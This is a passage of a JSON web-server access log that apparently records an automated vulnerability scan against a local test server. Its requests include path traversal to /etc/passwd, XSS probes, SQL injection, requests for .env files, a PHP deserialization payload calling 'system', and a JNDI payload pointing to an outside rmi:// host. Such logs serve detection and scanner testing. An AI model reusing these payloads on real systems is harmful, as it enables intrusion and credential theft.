HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controller/registry-clients HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /m_login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/bin/sqlnet.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log_download.cgi?type=../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/json/serverinfo/* HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static?/%2557EB-INF/web.xml HTTP/1.1","status":"301","body_bytes_sents":"169","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /calendar/admin/cal_login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login?!'>\x0D\x0A--------------------------aadc326f7ae3eac3--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/content/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-----------------------------154934846911423734231554128137\x0D\x0AContent-Disposition: form-data; name=\x22upload\x22; filename=\x2229K9NON5Lk6VBEtqKHqGDenQImO.php\x22\x0D\x0AContent-Type: application/x-php\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------154934846911423734231554128137--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /clients/editclient.php?id=29K9NON5Lk6VBEtqKHqGDenQImO&action=update HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"{ \x22link\x22: [ { \x22value\x22: \x22link\x22, \x22options\x22: \x22O:24:\x5C\x22GuzzleHttp\x5C\x5CPsr7\x5C\x5CFnStream\x5C\x22:2:{s:33:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CPsr7\x5C\x5CFnStream\x5Cu0000methods\x5C\x22;a:1:{s:5:\x5C\x22close\x5C\x22;a:2:{i:0;O:23:\x5C\x22GuzzleHttp\x5C\x5CHandlerStack\x5C\x22:3:{s:32:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000handler\x5C\x22;s:2:\x5C\x22id\x5C\x22;s:30:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000stack\x5C\x22;a:1:{i:0;a:1:{i:0;s:6:\x5C\x22system\x5C\x22;}}s:31:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000cached\x5C\x22;b:0;}i:1;s:7:\x5C\x22resolve\x5C\x22;}}s:9:\x5C\x22_fn_close\x5C\x22;a:2:{i:0;r:4;i:1;s:7:\x5C\x22resolve\x5C\x22;}}\x22 } ], \x22_links\x22: { \x22type\x22: { \x22href\x22: \x22http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default\x22 } } }","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /node/1?_format=hal_json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /routes/error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"{\x0D\x0A \x22application_type\x22: \x22web\x22,\x0D\x0A \x22redirect_uris\x22: [\x22https://ca281d8smpvb9r2g07h0m9fcmrugk1kkd.oast.site/callback\x22],\x0D\x0A \x22client_name\x22: \x22127.0.0.1\x22,\x0D\x0A \x22logo_uri\x22: \x22https://ca281d8smpvb9r2g07h0krgka7h5nrh4e.oast.site/favicon.ico\x22,\x0D\x0A \x22subject_type\x22: \x22pairwise\x22,\x0D\x0A \x22token_endpoint_auth_method\x22: \x22client_secret_basic\x22,\x0D\x0A \x22request_uris\x22: [\x22https://ca281d8smpvb9r2g07h0o9brsnk4cbgge.oast.site\x22]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /connect/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /h2-console/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.msmtprc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system-diagnostics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?pp=env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.staging.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cs/ContentServer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.Dockerfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29K9NN1coD2dxCvpIAsxQAZzb4Q.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"\x0D\x0A\x0D\x0A login\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logos_clients/1.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/jobs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.127.0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prweb/PRRestService/unauthenticatedAPI/v1/docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22Lcom.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca281d8smpvb9r2g07h08sf3pkxux8qpd.oast.site/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/products HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nifi-api/access/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", 